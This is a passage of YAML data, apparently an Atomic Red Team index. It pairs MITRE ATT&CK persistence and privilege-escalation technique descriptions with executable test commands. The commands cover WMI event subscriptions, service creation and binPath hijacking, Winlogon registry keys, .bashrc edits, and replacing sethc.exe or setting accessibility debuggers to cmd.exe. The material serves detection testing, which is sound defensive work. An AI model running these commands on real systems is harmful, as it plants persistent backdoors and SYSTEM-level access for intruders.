session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian - x_mitre_is_subtechnique: false - atomic_tests: [] - T1546.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.003 - url: https://attack.mitre.org/techniques/T1546/003 - - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the - Front Lines. Retrieved May 18, 2016.' - source_name: Mandiant M-Trends 2015 - - source_name: FireEye WMI SANS 2015 - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf - description: Devon Kerr. (2015). There's Something About WMI. Retrieved May - 4, 2020. - - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. - source_name: FireEye WMI 2015 - - url: https://www.secureworks.com/blog/wmi-persistence - description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, - March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. - source_name: Dell WMI Persistence - - source_name: Microsoft MOF May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- - description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved - January 24, 2020. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s - WMI Persistence. Retrieved October 11, 2019. - url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - source_name: Medium Detecting WMI Persistence - - source_name: Microsoft Register-WmiEvent - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 - description: Microsoft. (n.d.). Retrieved January 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Windows Management Instrumentation Event Subscription - description: |- - Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) - - Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) - - WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. - id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-05T12:02:45.522Z' - created: '2020-01-24T14:07:56.276Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) - - Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - WMI Objects - x_mitre_platforms: - - Windows - identifier: T1546.003 - atomic_tests: - - name: Persistence via WMI Event Subscription - auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 - description: | - Run from an administrator powershell window. After running, reboot the victim machine. - After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. - - Code references - - https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af - - https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - supported_platforms: - - windows - executor: - command: | - $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - EventNameSpace='root\CimV2'; - QueryLanguage="WQL"; - Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; - $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs - - $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} - $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs - - $FilterToConsumerArgs = @{ - Filter = [Ref] $Filter; - Consumer = [Ref] $Consumer; - } - $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs - cleanup_command: | - $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject - $EventConsumerToCleanup | Remove-WmiObject - $EventFilterToCleanup | Remove-WmiObject - name: powershell - elevation_required: true - T1543.003: - technique: - id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 - description: "Adversaries may create or modify Windows services to repeatedly - execute malicious payloads as part of persistence. When Windows boots up, - it starts programs or applications called services that perform background - system functions.(Citation: TechNet Services) Windows service configuration - information, including the file path to the service's executable or recovery - programs/commands, is stored in the Windows Registry. Service configurations - can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). - \n\nAdversaries may install a new service or modify an existing service by - using system utilities to interact with services, by directly modifying the - Registry, or by using custom tools to interact with the Windows API. Adversaries - may configure services to execute at startup in order to persist on a system.\n\nAn - adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) - by using a service name from a related operating system or benign software, - or by modifying existing services to make detection analysis more challenging. - Modifying existing services may interrupt their functionality or may enable - services that are disabled or otherwise not commonly used. \n\nServices may - be created with administrator privileges but are executed under SYSTEM privileges, - so an adversary may also use a service to escalate privileges from administrator - to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). " - name: Windows Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.003 - url: https://attack.mitre.org/techniques/T1543/003 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 - description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service - was installed in the system. Retrieved August 7, 2018.' - source_name: Microsoft 4697 APR 2017 - - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection - description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding - to help with intrusion detection. Retrieved August 7, 2018. - source_name: Microsoft Windows Event Forwarding FEB 2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:49:58.490Z' - created: '2020-01-17T19:13:50.402Z' - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - x_mitre_detection: "Monitor processes and command-line arguments for actions - that could create or modify services. Command-line invocation of tools capable - of adding or modifying services may be unusual, depending on how systems are - typically used in a particular environment. Services may also be modified - through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional - logging may need to be configured to gather the appropriate data. Remote access - tools with built-in features may also interact directly with the Windows API - to perform these functions outside of typical system utilities. Collect service - utility execution and service binary path arguments used for analysis. Service - binary paths may even be changed to execute commands or scripts. \n\nLook - for changes to service Registry entries that do not correlate with known software, - patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. - Changes to the binary path and the service startup type changed from manual - or disabled to automatic, if it does not typically do so, may be suspicious. - Tools such as Sysinternals Autoruns may also be used to detect system service - changes that could be attempts at persistence.(Citation: TechNet Autoruns) - \ \n\nCreation of new services may generate an alterable event (ex: Event - ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft - Windows Event Forwarding FEB 2018)). New, benign services may be created during - installation of new software.\n\nSuspicious program execution through services - may show up as outlier processes that have not been seen before when compared - against historical data. Look for abnormal process call trees from known services - and for execution of other commands that could relate to Discovery or other - adversary techniques. Data and events should not be viewed in isolation, but - as part of a chain of behavior that could lead to other activities, such as - network connections made for Command and Control, learning details about the - environment through Discovery, and Lateral Movement." - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Matthew Demaske, Adaptforward - - Travis Smith, Tripwire - - Pedro Harrison - identifier: T1543.003 - atomic_tests: - - name: Modify Fax service to run PowerShell - auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f - description: | - This test will temporarily modify the service Fax by changing the binPath to PowerShell - and will then revert the binPath change, restoring Fax to its original state. - Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: | - sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" - sc start Fax - cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul - 2>&1 - - name: Service Installation CMD - auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 - description: | - Download an executable from github and start it as a service. - Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_CMD - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: command_prompt - elevation_required: true - command: | - sc.exe create #{service_name} binPath= #{binary_path} - sc.exe start #{service_name} - cleanup_command: | - sc.exe stop #{service_name} >nul 2>&1 - sc.exe delete #{service_name} >nul 2>&1 - - name: Service Installation PowerShell - auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 - description: | - Installs A Local Service via PowerShell. - Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_PowerShell - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: powershell - elevation_required: true - command: | - New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" - Start-Service -Name "#{service_name}" - cleanup_command: | - Stop-Service -Name "#{service_name}" 2>&1 | Out-Null - try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} - catch {} - T1547.004: - technique: - created: '2020-01-24T16:59:59.688Z' - modified: '2020-04-21T16:00:41.277Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 - description: "Adversaries may abuse features of Winlogon to execute DLLs and/or - executables when a user logs in. Winlogon.exe is a Windows component responsible - for actions at logon/logoff as well as the secure attention sequence (SAS) - triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper - programs and functionalities that support Winlogon. (Citation: Cylance Reg - Persistence Sept 2013) \n\nMalicious modifications to these Registry keys - may cause Winlogon to load and execute malicious DLLs and/or executables. - Specifically, the following subkeys have been known to be possibly vulnerable - to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - - points to userinit.exe, the user initialization program executed when a - user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell - executed when a user logs on\n\nAdversaries may take advantage of these features - to repeatedly execute malicious code and establish persistence." - name: Winlogon Helper DLL - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.004 - url: https://attack.mitre.org/techniques/T1547/004 - - external_id: CAPEC-579 - source_name: capec - url: https://capec.mitre.org/data/definitions/579.html - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - x_mitre_detection: |- - Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. - - Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.004 - atomic_tests: - - name: Winlogon Shell Key Persistence - PowerShell - auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 - description: | - PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Shell" "explorer.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Userinit Key Persistence - PowerShell - auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb - description: | - PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Notify Key Logon Persistence - PowerShell - auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 - description: | - PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. - - Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of notification package to execute - type: Path - default: C:\Windows\Temp\atomicNotificationPackage.dll - executor: - command: | - New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force - Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force - cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" - -Force -ErrorAction Ignore - -' - name: powershell -persistence: - T1546.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.004 - url: https://attack.mitre.org/techniques/T1546/004 - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. - source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: ".bash_profile and .bashrc" - description: |- - Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. - - ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. - - The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc. - - Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware) - id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:28:04.990Z' - created: '2020-01-24T14:13:45.936Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: While users may customize their ~/.bashrc and - ~/.bash_profile files , there are only certain types of commands - that typically appear in these files. Monitor for abnormal commands such as - execution of unknown programs, opening network sockets, or reaching out across - the network when user profiles are loaded during the login process. - x_mitre_data_sources: - - Process use of network - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1546.004 - atomic_tests: - - name: Add command to .bash_profile - auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f - description: 'Adds a command to the .bash_profile file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bash_profile file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> ~/.bash_profile - -' - name: sh - - name: Add command to .bashrc - auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f - description: 'Adds a command to the .bashrc file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bashrc file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> ~/.bashrc - -' - name: sh - T1546.008: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.008 - url: https://attack.mitre.org/techniques/T1546/008 - - external_id: CAPEC-558 - source_name: capec - url: https://capec.mitre.org/data/definitions/558.html - - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html - description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: - Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' - source_name: FireEye Hikit Rootkit - - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom - description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to - the Kingdom. Retrieved July 5, 2017. - source_name: DEFCON2016 Sticky Keys - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - source_name: Narrator Accessibility Abuse - url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html - description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' - URI for Fileless Persistence. Retrieved April 28, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Accessibility Features - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. - - Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) - - Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. - - For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) - - Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) - - * On-Screen Keyboard: C:\Windows\System32\osk.exe - * Magnifier: C:\Windows\System32\Magnify.exe - * Narrator: C:\Windows\System32\Narrator.exe - * Display Switcher: C:\Windows\System32\DisplaySwitch.exe - * App Switcher: C:\Windows\System32\AtBroker.exe - id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-13T20:37:30.048Z' - created: '2020-01-24T14:32:40.315Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Changes to accessibility utility binaries or binary paths - that do not correlate with known software, patch cycles, etc., are suspicious. - Command line invocation of tools capable of modifying the Registry for associated - keys are also suspicious. Utility arguments and the binaries themselves should - be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Paul Speulstra, AECOM Global Security Operations Center - x_mitre_platforms: - - Windows - identifier: T1546.008 - atomic_tests: - - name: Attaches Command Prompt as a Debugger to a List of Target Processes - auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - description: | - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. - - Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. - supported_platforms: - - windows - input_arguments: - parent_list: - description: 'Comma separated list of system binaries to which you want - to attach each #{attached_process}. Default: "osk.exe" - -' - type: String - default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, - atbroker.exe - attached_process: - description: 'Full path to process to attach to target in #{parent_list}. - Default: cmd.exe - -' - type: Path - default: C:\windows\system32\cmd.exe - executor: - command: | - $input_table = "#{parent_list}".split(",") - $Name = "Debugger" - $Value = "#{attached_process}" - Foreach ($item in $input_table){ - $item = $item.trim() - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - } - cleanup_command: | - $input_table = "#{parent_list}".split(",") - Foreach ($item in $input_table) - { - $item = $item.trim() - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null - } - name: powershell - elevation_required: true - - name: Replace binary of sticky keys - auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - -' - supported_platforms: - - windows - executor: - command: | - copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe - takeown /F C:\Windows\System32\sethc.exe /A - icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t - copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe - cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - -' - name: command_prompt - elevation_required: true - T1098: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1098 - url: https://attack.mitre.org/techniques/T1098 - - source_name: Microsoft User Modified Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account - was changed. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 - - description: Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. - Retrieved November 4, 2019. - url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 - source_name: Microsoft Security Event 4670 - - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM - description: Warren, J. (2017, July 11). Manipulating User Passwords with - Mimikatz. Retrieved December 4, 2017. - source_name: InsiderThreat ChangeNTLM July 2017 - - url: https://github.com/gentilkiwi/mimikatz/issues/92 - description: 'Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm - work, but generate Windows events #92. Retrieved December 4, 2017.' - source_name: GitHub Mimikatz Issue 92 June 2017 - description: Adversaries may manipulate accounts to maintain access to victim - systems. 